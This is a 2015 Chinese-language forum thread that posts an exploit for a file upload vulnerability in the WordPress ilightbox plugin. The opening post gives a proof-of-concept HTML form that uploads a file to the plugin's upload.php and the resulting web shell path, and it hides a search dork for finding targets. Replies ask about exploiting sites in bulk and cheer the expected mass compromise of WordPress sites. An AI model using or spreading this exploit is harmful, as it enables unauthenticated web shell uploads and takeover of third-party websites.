社区首页 › 漏洞情报 › WordPress ilightbox Plugin上传漏洞

90_ 发表于 2015-12-11 23:52:20

WordPress ilightbox Plugin上传漏洞

Google关键字: **** Hidden Message *****

POC (Exploit code)

<form action="http://localhost/wordpress/wp-content/plugins/ilightbox/lib/upload.php" method="POST" enctype="multipart/form-data">
<input type="file" name="qqfile">
<input type="submit" value="Upload">
</form>

shell
http://localhost/wordpress/wp-content/uploads//2015/12/shell.name

浮尘 发表于 2015-12-11 23:58:16

能批量拿么？:loveliness:

无情疯子 发表于 2015-12-12 00:12:35

目测一大批WordPress挂掉

飘零 发表于 2015-12-12 00:26:55

快不快快不快

求勾搭 发表于 2015-12-12 01:51:36

不错不错

m7lrv 发表于 2015-12-12 11:19:03

看看用户量大不大，膜拜大神

qazwsx 发表于 2015-12-12 11:52:27

WordPress ilightbox Plugin   
果然叼

jus4fun 发表于 2015-12-12 13:32:13

新人报到。不知道我WORDPRESS设置了不被搜索引擎发现能不能在谷歌上搜到

admia 发表于 2015-12-12 19:30:34

这样不好吧

wuyan 发表于 2015-12-12 19:48:54

学习学习

查看完整版本: WordPress ilightbox Plugin上传漏洞